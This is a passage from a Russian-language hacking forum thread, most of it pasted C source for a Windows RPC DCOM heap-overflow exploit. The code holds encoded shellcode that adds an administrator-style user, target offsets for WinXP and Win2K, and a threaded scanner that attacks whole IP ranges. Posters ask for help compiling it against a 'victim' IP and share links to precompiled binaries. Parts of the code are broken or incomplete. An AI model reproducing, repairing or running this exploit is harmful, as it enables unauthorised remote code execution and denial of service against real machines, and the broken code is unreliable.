    ,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00
    ,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00
    ,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00
    ,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00};

    unsigned char request2[]={
    0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00
    ,0x00,0x00,0x5C,0x00,0x5C,0x00};

    unsigned char request3[]={
    0x46,0x00,0x43,0x00,0x24,0x00,0x46,0x00,
    0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00
    ,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
    ,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
    ,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00};


    unsigned char request4[]={
    0x01,0x10
    ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,0x00
    ,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8C
    ,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    };
    void XOR(unsigned char *buf,int offset,int lenght,unsigned char mask)
    {
    for(int i=offset;i<(offset+lenght);i++)
    buf=buf^mask;
    }
    DWORD GETSTRCS(char *buf)
    {
    DWORD cs=0;
    bool cld=false;
    for(unsigned int i=0;i<strlen(buf);i++)
    {
    for(int z=0;z<13;z++)
    {
    if(cs&1) cld=true;
    cs=cs>>1;
    if(cld) cs=cs|0x80000000;
    cld=false;
    }
    cs+=buf;
    }
    return cs;
    }

    struct {
    DWORD seh;
    DWORD jmp;
    DWORD heap;
    char target[200];
    } target_os[]=
    {
    {
    0x005Bfd2c,
    0x00081eeb,
    0x00180000,
    "WinXP"
    },
    {
    0x0095fd3c,
    0x00081eeb,
    0x00170000,
    "Win2K"
    }
    },v;
    unsigned char rawData1[]=
    "\x6C\x00\x6F\x00\x63\x00\x61\x00\x6C\x00\x68\x00"
    "\x6F\x00\x73\x00\x74\x00\x5C\x00\x43\x00\x24\x00\x5C\x00"

    "\x58\x00\xeb\x3c\x46\x00\x46\x00\xeb\x7c\x46\x00\x46\x00\x38\x6e"
    "\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x58\x83\xc0\x1b\x8d\xa0\x01"
    "\xeb\x1e\xff\x83\xe4\xfc\x8b\xec\x33\xc9\x66\xb9\x99\x01\x80\x30"
    "\xf6\xe0\xe0\x93\xdf\xfc\xf2\xf7\xeb\x06\xf1\xe1\xf2\xe1\xea\xd2"

    //SHELLCODE From SAM ,THANKs !
    //Add user SST,password is 557,
    "\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x4D\x01\x80\x34\x0A\x99\xE2\xFA"
    "\xEB\x05\xE8\xEB\xFF\xFF\xFF"

    "\x70\xDA\x98\x99\x99\xCC\x12\x75\x18\x75\x19\x99\x99\x99\x12\x6D"
    "\x71\x92\x98\x99\x99\x10\x9F\x66\xAF\xF1\x01\x67\x13\x97\x71\x3C"
    "\x99\x99\x99\x10\xDF\x95\x66\xAF\xF1\xE7\x41\x7B\xEA\x71\x0F\x99"
    "\x99\x99\x10\xDF\x89\xFD\x38\x81\x99\x99\x99\x12\xD9\xA9\x14\xD9"
    "\x81\x22\x99\x99\x8E\x99\x10\x81\xAA\x59\xC9\xF3\xFD\xF1\xB9\xB6"
    "\xF8\xFD\xF1\xB9\xEA\xEA\xED\xF1\xEC\xEA\xFC\xEB\xF1\xF7\xFC\xED"
    "\xB9\x12\x55\xC9\xC8\x66\xCF\x95\xAA\x59\xC9\xF1\xB9\xAC\xAC\xAE"
    "\xF1\xB9\xEA\xEA\xED\xF1\xEC\xEA\xFC\xEB\xF1\xF7\xFC\xED\xB9\x12"
    "\x55\xC9\xC8\x66\xCF\x95\xAA\x59\xC9\xF1\xFD\xFD\x99\x99\xF1\xED"
    "\xB9\xB6\xF8\xF1\xEA\xB9\xEA\xEA\xF1\xF8\xED\xF6\xEB\xF1\xF0\xEA"
    "\xED\xEB\xF1\xFD\xF4\xF0\xF7\xF1\xEC\xE9\xB9\xF8\xF1\xF5\xFE\xEB"
    "\xF6\xF1\xF5\xF6\xFA\xF8\xF1\xF7\xFC\xED\xB9\x12\x55\xC9\xC8\x66"
    "\xCF\x95\xAA\x59\xC9\x66\xCF\x89\xCA\xCC\xCF\xCE\x12\xF5\xBD\x81"
    "\x12\xDC\xA5\x12\xCD\x9C\xE1\x9A\x4C\x12\xD3\x81\x12\xC3\xB9\x9A"
    "\x44\x7A\xAB\xD0\x12\xAD\x12\x9A\x6C\xAA\x66\x65\xAA\x59\x35\xA3"
    "\x5D\xED\x9E\x58\x56\x94\x9A\x61\x72\x6B\xA2\xE5\xBD\x8D\xEC\x78"
    "\x12\xC3\xBD\x9A\x44\xFF\x12\x95\xD2\x12\xC3\x85\x9A\x44\x12\x9D"
    "\x12\x9A\x5C\x72\x9B\xAA\x59\x12\x4C\xC6\xC7\xC4\xC2\x5B\x9D\x99"
    "\xCC\xCF\xFD\x38\xA9\x99\x99\x99\x1C\x59\xE1\x95\x12\xD9\x95\x12"
    "\xE9\x85\x34\x12\xF1\x91\x72\x90\x12\xD9\xAD\x12\x31\x21\x99\x99"
    "\x99\x12\x5C\xC7\xC4\x5B\x9D\x99\x71\x21\x67\x66\x66"

    "\x6e\x60\x38\xcc\x54\xd6\x93\xd7\x93\x93\x93\x1a\xce\xaf\x1a\xce"
    "\xab\x1a\xce\xd3\x54\xd6\xbf\x92\x92\x93\x93\x1e\xd6\xd7\xc3\xc6"
    "\xc2\xc2\xc2\xd2\xc2\xda\xc2\xc2\xc5\xc2\x6c\xc4\x77\x6c\xe6\xd7"
    "\x6c\xc4\x7b\x6c\xe6\xdb\x6c\xc4\x7b\xc0\x6c\xc4\x6b\xc3\x6c\xc4"
    "\x7f\x19\x95\xd5\x17\x53\xe6\x6a"
    "\xc2\xc1\xc5\xc0\x6c\x41\xc9\xca"
    "\x1a\x94\xd4\xd4\xd4\xd4\x71\x7a\x50\x90\x90\x90" //
    "\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x77\xe0\x43\x00\x00\x10\x5c\x00"
    "\xeb\x1e\x01\x00"// FOR CN SP3/SP4+-MS03-26
    "\x4C\x14\xec\x77"// TOP SEH FOR cn w2k+SP4,must modify to SEH of your target's os


    //FILL BYTE,so sizeof(UNC)>0X400(0X80*8),why? You can read more form my artic
    //"Utilization of released heap structure and exploit of universal Heap overflow in windows ".
    "\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x90\x02\x80\x34\x0A\x99\xE2\xFA"
    "\xEB\x05\xE8\xEB\xFF\xFF\xFF"
    "\xC7\x5F\x9D\xBD\xDD\x14\xDD\xBD\xDD\xC9\x14\xDD\xBD\x9D\xC9\x14"
    "\x1D\xBD\x1D\x99\x99\x99\xC9\x14\x1D\xBD\x0D\x99\x99\x99\xC9\xAA"
    "\x59\xC9\xC9\xC9\xC9\xCA\x14\x1D\xBD\x2D\x99\x99\x99\xC9\x66\xCF"
    "\x95\x14\xD5\xBD\xDD\x14\x8D\xBD\xAA\x59\xC9\xF1\xAC\x99\xAE\x99"
    "\xF1\xB9\x99\xAC\x99\xF1\xEA\x99\xED\x99\xF1\xB9\x99\xEA\x99\xF1"
    "\xFC\x99\xEB\x99\xF1\xEC\x99\xEA\x99\xF1\xED\x99\xB9\x99\xF1\xF7"
    "\x99\xFC\x99\x12\x45\xC8\xCB\xC8\xCB\x14\x1D\xBD\x29\x99\x99\x99"
    "\xC9\x14\x1D\xBD\x59\x99\x99\x99\xC9\xAA\x59\xC9\xC9\xC9\xC9\xCA"
    "\x14\x1D\xBD\x79\x99\x99\x99\xC9\x66\xCF\x95\xC3\xC0\xAA\x59\xC9"
    "\xF1\xFD\x99\xFD\x99\xF1\xB6\x99\xF8\x99\xF1\xED\x99\xB9\x99\xF1"
    "\xEA\x99\xEA\x99\xF1\xEA\x99\xB9\x99\xF1\xF6\x99\xEB\x99\xF1\xF8"
    "\x99\xED\x99\xF1\xED\x99\xEB\x99\xF1\xF0\x99\xEA\x99\xF1\xF0\x99"
    "\xF7\x99\xF1\xFD\x99\xF4\x99\xF1\xB9\x99\xF8\x99\xF1\xEC\x99\xE9"
    "\x99\xF1\xEB\x99\xF6\x99\xF1\xF5\x99\xFE\x99\xF1\xFA\x99\xF8\x99"
    "\xF1\xF5\x99\xF6\x99\xF1\xED\x99\xB9\x99\xF1\xF7\x99\xFC\x99\x12"
    "\x45\xC8\xCB\x14\x1D\xBD\x61\x99\x99\x99\xC9\x14\x1D\xBD\x91\x98"
    "\x99\x99\xC9\xAA\x59\xC9\xC9\xC9\xC9\xCA\x14\x1D\xBD\xB1\x98\x99"
    "\x99\xC9\x66\xCF\x95\xAA\x59\xC9\x66\xCF\x89\xCA\xCC\xCF\xCE\x12"
    "\xF5\xBD\x81\x12\xDC\xA5\x12\xCD\x9C\xE1\x9A\x4C\x12\xD3\x81\x12"
    "\xC3\xB9\x9A\x44\x7A\xAB\xD0\x12\xAD\x12\x9A\x6C\xAA\x66\x65\xAA"
    "\x59\x35\xA3\x5D\xED\x9E\x58\x56\x94\x9A\x61\x72\x6B\xA2\xE5\xBD"
    "\x8D\xEC\x78\x12\xC3\xBD\x9A\x44\xFF\x12\x95\xD2\x12\xC3\x85\x9A"
    "\x44\x12\x9D\x12\x9A\x5C\x72\x9B\xAA\x59\x12\x4C\xC6\xC7\xC4\xC2"
    "\x5B\x9D\x99\xCC\xCF\xFD\x38\xA9\x99\x99\x99\x1C\x59\xE1\x95\x12"
    "\xD9\x95\x12\xE9\x85\x34\x12\xF1\x91\x72\x90\x12\xD9\xAD\x12\x31"
    "\x21\x99\x99\x99\x12\x5C\xC7\xC4\x5B\x9D\x99\x71\xEC\x64\x66\x66"

    "\x04\x04\x00\x70\x00\x04\x40"
    "\x00\x10\x5c\x00\x78\x01\x07\x00\x78\x01\x07\x00\xa0\x04\x00"

    "\x21\x99\x99\x99\x12\x5C\xC7\xC4\x5B\x9D\x99\x71";


    int version(char ip[16], int sock)
    {
    //un poco de ettercap...


    unsigned char peer0_0[] = {
    0x05, 0x00, 0x0b, 0x03, 0x10, 0x00, 0x00, 0x00,
    0xcc, 0x00, 0x00, 0x00, 0x84, 0x67, 0xbe, 0x18,
    0x31, 0x14, 0x5c, 0x16, 0x00, 0x00, 0x00, 0x00,
    0x04, 0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00,
    0xb8, 0x4a, 0x9f, 0x4d, 0x1c, 0x7d, 0xcf, 0x11,
    0x86, 0x1e, 0x00, 0x20, 0xaf, 0x6e, 0x7c, 0x57,
    0x00, 0x00, 0x00, 0x00, 0x04, 0x5d, 0x88, 0x8a,
    0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00,
    0x2b, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00,
    0x02, 0x00, 0x01, 0x00, 0xa0, 0x01, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x46, 0x00, 0x00, 0x00, 0x00,
    0x04, 0x5d, 0x88, 0x8a, 0xeb, 0x1c, 0xc9, 0x11,
    0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60,
    0x02, 0x00, 0x00, 0x00, 0x03, 0x00, 0x01, 0x00,
    0x0a, 0x42, 0x24, 0x0a, 0x00, 0x17, 0x21, 0x41,
    0x2e, 0x48, 0x01, 0x1d, 0x13, 0x0b, 0x04, 0x4d,
    0x00, 0x00, 0x00, 0x00, 0x04, 0x5d, 0x88, 0x8a,
    0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00,
    0x2b, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00,
    0x04, 0x00, 0x01, 0x00, 0xb0, 0x01, 0x52, 0x97,
    0xca, 0x59, 0xcf, 0x11, 0xa8, 0xd5, 0x00, 0xa0,
    0xc9, 0x0d, 0x80, 0x51, 0x00, 0x00, 0x00, 0x00,
    0x04, 0x5d, 0x88, 0x8a, 0xeb, 0x1c, 0xc9, 0x11,
    0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60,
    0x02, 0x00, 0x00, 0x00 };


    unsigned char peer0_1[] = {
    0x05, 0x00, 0x00, 0x03, 0x10, 0x00, 0x00, 0x00,
    0xaa, 0x00, 0x00, 0x00, 0x41, 0x41, 0x41, 0x41,
    0x80, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
    0x05, 0x00, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x28, 0x63, 0x29, 0x20,
    0x75, 0x65, 0x72, 0x84, 0x20, 0x73, 0x73, 0x53,
    0x20, 0x82, 0x80, 0x67, 0x00, 0x00, 0x00, 0x00,
    0x80, 0x1d, 0x94, 0x5e, 0x96, 0xbf, 0xcd, 0x11,
    0xb5, 0x79, 0x08, 0x00, 0x2b, 0x30, 0xbf, 0xeb,
    0x01, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00,
    0x5c, 0x00, 0x5c, 0x00, 0x41, 0x00, 0x00, 0x00,
    0x41, 0x00, 0x41, 0x00, 0x5c, 0x00, 0x43, 0x00,
    0x24, 0x00, 0x5c, 0x00, 0x41, 0x00, 0x2e, 0x00,
    0x74, 0x00, 0x78, 0x00, 0x74, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00,
    0xff, 0xff, 0xff, 0xff, 0x01, 0x00, 0x00, 0x00,
    0x58, 0x73, 0x0b, 0x00, 0x01, 0x00, 0x00, 0x00,
    0x31, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46,
    0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
    0x07, 0x00 };

    /*

    unsigned char win2kvuln[] = {
    0x04, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00,
    0x04, 0x5d, 0x88, 0x8a,
    0xeb, 0x1c, 0xc9, 0x11,
    0x9f, 0xe8, 0x08, 0x00,
    0x2b, 0x10, 0x48, 0x60,
    0x02, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00,
    0x04, 0x5d, 0x88, 0x8a,
    0xeb, 0x1c, 0xc9, 0x11,
    0x9f, 0xe8, 0x08, 0x00,
    0x2b, 0x10, 0x48, 0x60,
    0x02, 0x00, 0x00, 0x00};
    */
    fd_set fds2;
    unsigned char buf[1024];

    int l;
    struct timeval tv2;
    FD_ZERO(&fds2);
    FD_SET(sock, &fds2);
    tv2.tv_sec = 6;
    tv2.tv_usec = 0;

    memset(buf,'\0',sizeof(buf));
    send(sock,(char *)peer0_0,sizeof(peer0_0),0);
    if(select(sock +1, &fds2, NULL, NULL, &tv2) > 0)
    {
    l=recv (sock, (char *)buf, sizeof (buf),0);
    // for(i=0;i<52;i++)
    // {
    // if (i==28) i=i+4;
    // if (buf[i+32]!=win2kvuln)
    // {
    send(sock,(const char *)peer0_1,sizeof(peer0_1),0);
    if(select(sock +1, &fds2, NULL, NULL, &tv2) > 0)
    {
    memset(buf,'\0',sizeof(buf));
    l=recv (sock, (char *)buf, sizeof (buf),0);
    if (l==32)
    {
    closesocket(sock);
    return(1);//winxp
    }
    else
    {
    #ifdef WIN32
    closesocket(sock);
    #else
    close(sock);
    #endif
    return(0);//win2kby default. Nt4 not added..
    }
    }
    else return(-1);
    // }


    //}
    // closesocket(sock);
    // return(0);//win2k
    }
    closesocket(sock);
    return(-1); //Unknown
    }
    /********************************************************************************/
    int attack(char *ip1,bool atack)
    {
    unsigned char rawData[1036];
    memcpy(rawData,rawData1,1036);
    unsigned char shellcode[50000];
    char ip[200];
    strcpy(ip,ip1);
    WSADATA WSAData;
    SOCKET sock;
    int len,len1;
    SOCKADDR_IN addr_in;
    short port=135;
    unsigned char buf1[50000];
    unsigned char buf2[50000];

    printf("%s\n",ip);
    //printf("RPC DCOM overflow Vulnerability discoveried by NSFOCUS\n");
    //printf("Code by FlashSky,Flashsky xfocus org\n");
    //printf("Welcome to our Site: http://www.xfocus.org\n");
    //printf("Welcome to our Site: http://www.venustech.com.cn\n");
    /* if(argc!=3)
    {
    printf("%s targetIP targetOS\ntargets:\n",argv[0]);
    for(int i=0;i<sizeof(target_os)/sizeof(v);i++)
    printf("%d - %s\n",i,target_os.target);
    printf("\n%x\n",GETSTRCS(argv[1]));
    return;
    }
    */
    /* if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0)
    {
    printf("WSAStartup error.Error:%d\n",WSAGetLastError());
    return;
    }
    */
    addr_in.sin_family=AF_INET;
    addr_in.sin_port=htons(port);
    addr_in.sin_addr.S_un.S_addr=inet_addr(ip);

    if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET)
    {
    printf("Socket failed.Error:%d\n",WSAGetLastError());
    return 0;
    }
    len1=sizeof(request1);

    len=sizeof(rawData);

    if(WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL)==SOCKET_ERROR)
    {
    printf("%s - connect failed\n",ip);
    return 0;
    }

    int vers=!version(ip,sock);

    // printf("%d\n",vers);
    // return;
    // int vers=1;

    FILE *fp;

    //?? ?? ? ???
    // fp=fopen("shellcode","rb");
    // fread(rawData,1,1036,fp);
    // fclose(fp);
    //???? ??? ???? ?? ??????????? ?????? ?????!

    fp=fopen("bshell2","rb");
    int sz=fread(shellcode,1,1024,fp);
    fclose(fp);
    // printf("%d\n",sz);
    for(int i=0;i<sz;i++)
    rawData[i+0x71]=shellcode;
    // fp=fopen("badfile.exe","rb");
    // unsigned int sz1=fread(shellcode,1,50000,fp);
    // fclose(fp);
    // for(i=0;i<sz1;i++)
    // rawData[i+0x240]=shellcode;

    // fp=fopen("pac","wb");
    // fwrite(rawData,1,1036,fp);
    // fclose(fp);

    // return;


    //??? ? ? ? ????? ? ??? ??? ???????? HEAP'a
    // DWORD heap=0x00180000;
    // int k=vers;
    // vers=1;
    // *(DWORD *)(rawData+0xae)=target_os[vers].heap;
    *(DWORD *)(rawData+0x71+0x1e)=target_os[vers].heap;
    //?????? ??? ?????? ? ? ???, ??? ?? ??? ??????? ??? ?
    XOR(rawData,0x71,sz,0x99);
    // XOR(rawData,0x240,sz1,0x99);
    //? ? ?? ? ? ??? ? ??? ?? ??? ? ? SEH ? JMP
    DWORD seh=target_os[vers].seh;
    DWORD jmp=target_os[vers].jmp;
    *(DWORD *)(rawData+0x22a)=jmp;
    *(DWORD *)(rawData+0x22e)=seh;
    // *(WORD *)(rawData+0x62)=sz+sz1+(0x240-(0x71+sz));
    *(WORD *)(rawData+0x62)=sz;


    memcpy(buf2,request1,sizeof(request1));
    *(DWORD *)(request2)=*(DWORD *)(request2)+sizeof(rawData)/2;
    *(DWORD *)(request2+8)=*(DWORD *)(request2+8)+sizeof(rawData)/2;
    memcpy(buf2+len1,request2,sizeof(request2));
    len1=len1+sizeof(request2);

    memcpy(buf2+len1,rawData,sizeof(rawData));
    len1=len1+sizeof(rawData);

    memcpy(buf2+len1,request3,sizeof(request3));
    len1=len1+sizeof(request3);
    memcpy(buf2+len1,request4,sizeof(request4));
    len1=len1+sizeof(request4);
    *(DWORD *)(buf2+8)=*(DWORD *)(buf2+8)+len-0xc;

    *(DWORD *)(buf2+0x10)=*(DWORD *)(buf2+0x10)+len-0xc;
    *(DWORD *)(buf2+0x80)=*(DWORD *)(buf2+0x80)+len-0xc;
    *(DWORD *)(buf2+0x84)=*(DWORD *)(buf2+0x84)+len-0xc;
    *(DWORD *)(buf2+0xb4)=*(DWORD *)(buf2+0xb4)+len-0xc;
    *(DWORD *)(buf2+0xb8)=*(DWORD *)(buf2+0xb8)+len-0xc;
    *(DWORD *)(buf2+0xd0)=*(DWORD *)(buf2+0xd0)+len-0xc;
    *(DWORD *)(buf2+0x18c)=*(DWORD *)(buf2+0x18c)+len-0xc;

    closesocket(sock);
    if(atack)
    {
    sock=socket(2,1,0);
    WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL);

    if (send(sock,(const char *)bindstr,sizeof(bindstr),0)==SOCKET_ERROR)
    {
    printf("%s - send failed %d\n",ip,WSAGetLastError());
    return 0;
    }
    else {printf("%s - send exploit to %s\n",ip,target_os[vers].target);}

    len=recv(sock,(char *)buf1,1000,NULL);
    bool ft=1;
    if(ft)
    {
    int i=0;
    while(1)
    {
    if (send(sock,(const char *)buf2,len1,0)==SOCKET_ERROR)
    {
    printf("\nSend failed.Error:%d\n",WSAGetLastError());
    return 0;
    }
    else
    {
    printf("\r%d",++i);
    }
    //Sleep(1000);
    }
    }
    send(sock,(const char *)buf2,len1,0);
    closesocket(sock);
    }
    else fprintf(fp1,"%s %s\n",target_os[vers].target,ip);
    // fp=fopen("pac","wb");
    // fwrite(rawData,1,1036,fp);
    // fclose(fp);
    }
    unsigned long thread_count=0;
    char adr[200];

    DWORD WINAPI ThreadProc(
    LPVOID lpParameter // thread data
    )
    {
    thread_count++;
    attack(adr,0);

    thread_count--;
    return 0;
    }

    int main(int argc,char ** argv)
    {
    //printf("%x %x",OF_READWRITE,GETSTRCS(argv[1]));
    //return;
    //HFILE hf=_lopen("asd123",0x1001);
    //printf("%x",hf);
    //_lclose(hf);
    //return;

    if(argc!=2){
    fprintf(stderr, "RPC universal exploit. Exploit MS09-039 vulnerability\n"
    "unpatched host - to codee xecution\n"
    "patched host - to DoS\n"
    "based on original XFocus RPCDCOM2 exploit\n"
    "modification and shellcode (c) by karlss0n\n"
    "downloaded on www.k-otik.com\n"
    "\n"
    "usage: %s <target_ip>\n",
    argv[0]);
    return 10;
    }

    WSADATA wsaData;

    int wVersionRequested;
    wVersionRequested = MAKEWORD( 2, 2 );

    int err = WSAStartup( wVersionRequested, &wsaData );
    if ( err != 0 ) {
    /* Tell the user that we could not find a usable */
    /* WinSock DLL. */
    return 1;
    }


    if(strchr(argv[1],'.'))
    {
    attack(argv[1],1);
    Sleep(20000);
    return 2;
    }
    int cb=1,db=1;
    cb=atoi(argv[3]);
    db=atoi(argv[4]);
    long tm=atoi(argv[5]);
    for(int c=cb;c<255;c++)
    {
    for(int d=db;d<255;d++)
    {
    sprintf(adr,"%s.%s.%d.%d",argv[1],argv[2],c,d);
    if(thread_count>tm) while(thread_count>tm) Sleep(100);
    CreateThread(NULL,0,&ThreadProc,(void *)"",0,NULL);
    Sleep(10);
    fflush(fp1);
    }
    }
    Sleep(60000);
    fclose(fp1);
    return 0;

    }

    // milw0rm.com [2003-10-09]
    -----------------------------------------------
    этот скомпилился, но када запускаешь выдаёт следующее:
    без ввода параметров
    C:\Documents and Settings\Администратор>"C:\Documents and Settings\Администратор
    \Рабочий стол\sploit.exe"
    RPC universal exploit. Exploit MS09-039 vulnerability
    unpatched host - to codee xecution
    patched host - to DoS
    based on original XFocus RPCDCOM2 exploit
    modification and shellcode (c) by karlss0n
    downloaded on www.k-otik.com

    usage: C:\Documents and Settings\└фьшэшёЄЁрЄюЁ\╨рсюўшщ ёЄюы\sploit.exe <target_i
    p>
    с вводом параметра (*.*.*.* - ip жертвы)
    C:\Documents and Settings\Администратор>"C:\Documents and Settings\Администратор
    \Рабочий стол\sploit.exe" *.*.*.*
    *.*.*.*

    C:\Documents and Settings\Администратор>

    вопщем помогите кто чем может
    ссылки на милворм:
    1 сплоит http://milw0rm.com/exploits/103
    2 сплоит http://milw0rm.com/exploits/109
     
    #2 $ereg@, 4 Mar 2009
    Last edited: 4 Mar 2009
  3. Rubaka

    Rubaka Elder - Старейшина

    Joined:
    2 Sep 2007
    Messages:
    263
    Likes Received:
    150
    Reputations:
    28
    4ем компилишь? я http://milw0rm.com/exploits/103 скомпилил в Visual норм!
     
    #3 Rubaka, 4 Mar 2009
  4. spider-intruder

    spider-intruder Elder - Старейшина

    Joined:
    9 Dec 2005
    Messages:
    700
    Likes Received:
    339
    Reputations:
    37
    На оба сплоента скомпиленых
    http://www.sendspace.com/file/z0frfs
     
    #4 spider-intruder, 4 Mar 2009
    2 people like this.
(You must log in or sign up to post here.)